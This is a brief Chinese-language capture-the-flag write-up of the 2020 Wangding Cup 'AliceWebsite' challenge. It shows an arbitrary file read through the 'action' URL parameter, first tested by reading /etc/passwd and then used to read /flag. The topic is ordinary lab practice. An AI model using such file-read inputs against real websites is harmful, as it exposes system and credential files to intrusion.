[网鼎杯 2020 半决赛]AliceWebsite

2024-06-20- 2024-09-24

62- 1m- -

打开页面，我们在url里发现一个

1	?action=home.php

我们猜测为任意文件读取，我们输入

1	/etc/passwd

有输出，我们直接读取flag

1	?action=/flag

我很可爱，请给我钱

Post author: kinsey
Post link: https://kinsey973.github.io/2024/06/20/%E7%BD%91%E9%BC%8E%E6%9D%AF-2020-%E5%8D%8A%E5%86%B3%E8%B5%9B-AliceWebsite/
Copyright Notice: All articles in this blog are licensed under unless otherwise stated.